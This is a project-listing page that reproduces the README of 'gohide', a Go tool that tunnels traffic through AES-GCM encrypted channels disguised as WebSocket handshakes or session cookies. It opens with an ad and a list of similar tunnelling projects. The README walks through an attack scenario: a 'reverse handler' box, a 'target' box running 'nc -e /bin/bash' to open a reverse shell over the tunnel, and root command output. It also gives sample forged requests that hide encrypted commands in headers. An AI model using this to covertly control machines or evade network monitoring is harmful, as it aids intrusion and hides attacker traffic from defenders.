GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → Potato-Industries → gohide

Potato-Industries / gohide

Licence: other
tunnel port to port traffic over an obfuscated channel with AES-GCM encryption.

Programming Languages

go
31211 projects - #10 most used programming language

Labels

tunnelsecurityobfuscationtcpport-forwarding

Projects that are alternatives of or similar to gohide

Mole
CLI application to create ssh tunnels focused on resiliency and user experience.
Stars: ✭ 1,520 (+2351.61%)
Mutual labels:  tunnel, port-forwarding
aiotunnel
HTTP tunnel on top of aiohttp and asyncio
Stars: ✭ 29 (-53.23%)
Mutual labels:  tunnel, port-forwarding
tunman
Comprehensive solution for SSH tunnels - respawning, healthchecking/monitoring
Stars: ✭ 43 (-30.65%)
Mutual labels:  tunnel, port-forwarding
nat-tunnel
NAT Tunnel: to effortlessly serve from behind NAT
Stars: ✭ 75 (+20.97%)
Mutual labels:  tunnel, port-forwarding
Teleconsole
Command line tool to share your UNIX terminal and forward local TCP ports to people you trust.
Stars: ✭ 2,750 (+4335.48%)
Mutual labels:  tunnel
Zserver4d
ZServer4D 是一套从商业项目剥离而出的云服务器中间件,可以承载百万级的分布式负载服务,并且支持IoT及内网穿透
Stars: ✭ 199 (+220.97%)
Mutual labels:  tunnel
Drawbridge
manage SSH access to multiple applications/environments protected by bastion servers
Stars: ✭ 196 (+216.13%)
Mutual labels:  tunnel
Tunnelkit
Non-official OpenVPN client library for Apple platforms.
Stars: ✭ 180 (+190.32%)
Mutual labels:  tunnel
scotty
java proxy
Stars: ✭ 44 (-29.03%)
Mutual labels:  tunnel
AutoIt-Obfuscator
AutoIt Obfuscator lets you protect AutoIt script source code against analysis, reverse engineering & decompilation using advanced obfuscation techniques and polymorphic encryption.
Stars: ✭ 31 (-50%)
Mutual labels:  obfuscation
Fasttunnel
NAT 内网穿透 远程内网计算机 域名访问内网站点 反向代理内网服务 花生壳 端口转发 http代理 微信 小程序 expose a local server behind a NAT or firewall to the internet like ngrok and frp. NAT ssh proxy tunnel reverse-proxy
Stars: ✭ 248 (+300%)
Mutual labels:  tunnel
Secure Wireguard Implementation
A guide on implementing a secure Wireguard server on OVH (or any other Debian VPS) with DNSCrypt, Port Knocking & an SSH-Honeypot
Stars: ✭ 200 (+222.58%)
Mutual labels:  tunnel
Clash
A rule-based tunnel in Go.
Stars: ✭ 21,929 (+35269.35%)
Mutual labels:  tunnel
Awesome Anti Gfw
突破网络审查和封锁的开源工具清单。
Stars: ✭ 198 (+219.35%)
Mutual labels:  tunnel
Ssh-Pascal
Delphi ssh library wrapping libssh2
Stars: ✭ 42 (-32.26%)
Mutual labels:  tunnel
Fq Book
📖《这本书能让你连接互联网》详细阐述代理、隧道、VPN运作过程,并对GFW策略如:地址端口封锁、服务器缓存投毒、数字验证攻击、SSL连接阻断做相关的原理说明
Stars: ✭ 2,393 (+3759.68%)
Mutual labels:  tunnel
Go Http Tunnel
Fast and secure tunnels over HTTP/2
Stars: ✭ 2,786 (+4393.55%)
Mutual labels:  tunnel
CosmicClone
Cosmic Clone is a utility that can backup\clone\restore a azure Cosmos database Collection. It can also anonymize cosmos documents and helps hide personally identifiable data.
Stars: ✭ 113 (+82.26%)
Mutual labels:  obfuscation
Otunnel
peer-to-peer tunnel tool
Stars: ✭ 224 (+261.29%)
Mutual labels:  tunnel
Icmptunnel
Transparently tunnel your IP traffic through ICMP echo and reply packets.
Stars: ✭ 2,753 (+4340.32%)
Mutual labels:  tunnel
View All Similar Projects ➔

gohide

Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption.

Obfuscation Modes

  • Session Cookie HTTP GET (http-client)
  • Set-Cookie Session Cookie HTTP/2 200 OK (http-server)
  • WebSocket Handshake "Sec-WebSocket-Key" (websocket-client)
  • WebSocket Handshake "Sec-WebSocket-Accept" (websocket-server)
  • No obfuscation, just use AES-GCM encrypted messages (none)

AES-GCM is enabled by default for each of the options above.

Usage

root@WOPR-KALI:/opt/gohide-dev# ./gohide -h
Usage of ./gohide:
  -f string
    	listen fake server -r x.x.x.x:xxxx (ip/domain:port) (default "0.0.0.0:8081")
  -key openssl passwd -1 -salt ok | md5sum
    	aes encryption secret: use '-k openssl passwd -1 -salt ok | md5sum' to derive key from password (default "5fe10ae58c5ad02a6113305f4e702d07")
  -l string
    	listen port forward -l x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:8080")
  -m string
    	obfuscation mode (AES encrypted by default): websocket-client, websocket-server, http-client, http-server, none (default "none")
  -pem string
    	path to .pem for TLS encryption mode: default = use hardcoded key pair 'CN:target.com', none = plaintext mode (default "default")
  -r string
    	forward to remote fake server -r x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:9999")

Scenario

Box A - Reverse Handler.

root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:8081 -l 127.0.0.1:8080 -r target.com:9091 -m websocket-client
Local Port Forward Listening: 127.0.0.1:8080
FakeSrv Listening: 0.0.0.0:8081

Box B - Target.

root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:9091 -l 127.0.0.1:9090 -r target.com:8081 -m websocket-server
Local Port Forward Listening: 127.0.0.1:9090
FakeSrv Listening: 0.0.0.0:9091

Note: /etc/hosts "127.0.0.1 target.com"

Box B - Netcat /bin/bash

root@WOPR-KALI:/var/tmp# nc -e /bin/bash 127.0.0.1 9090

Box A - Netcat client

root@WOPR-KALI:/opt/gohide# nc -v 127.0.0.1 8080
localhost [127.0.0.1] 8080 (http-alt) open
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux WOPR-KALI 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-1kali1 (2019-11-11) x86_64 GNU/Linux
netstat -pantwu 
Active Internet connections (servers and established)
tcp        0      0 127.0.0.1:39684         127.0.0.1:8081          ESTABLISHED 14334/./gohide

Obfuscation Samples

websocket-client (Box A to Box B)

  • Sec-WebSocket-Key contains AES-GCM encrypted content e.g. "uname -a".
GET /news/api/latest HTTP/1.1
Host: cdn-tb0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: 6jZS+0Wg1IP3n33RievbomIuvh5ZdNMPjVowXm62
Sec-WebSocket-Version: 13

websocket-server (Box B to Box A)

  • Sec-WebSocket-Accept contains AES-GCM encrypted output.
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: URrP5l0Z3NIHXi+isjuIyTSKfoP60Vw5d2gqcmI=

http-client

  • Session cookie header contains AES-GCM encrypted content
GET /news/api/latest HTTP/1.1
Host: cdn-tbn0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://www.bbc.co.uk/
Connection: keep-alive
Cookie: Session=R7IJ8y/EBgCanTo6fc0fxhNVDA27PFXYberJNW29; Secure; HttpOnly

http-server

  • Set-Cookie header contains AES-GCM encrypted content.
HTTP/2.0 200 OK
content-encoding: gzip
content-type: text/html; charset=utf-8
pragma: no-cache
server: nginx
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, must-revalidate
expires: Thu, 21 Nov 2019 01:07:15 GMT
date: Thu, 21 Nov 2019 01:07:15 GMT
content-length: 30330
vary: Accept-Encoding
X-Firefox-Spdy: h2
Set-Cookie: Session=gWMnQhh+1vkllaOxueOXx9/rLkpf3cmh5uUCmHhy; Secure; Path=/; HttpOnly

none

8JWxXufVora2FNa/8m2Vnub6oiA2raV4Q5tUELJA

Screenshot from 2019-11-21 02-26-30

Screenshot from 2019-11-21 16-40-07

Future

  • Fix up error handling.

Enjoy~

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].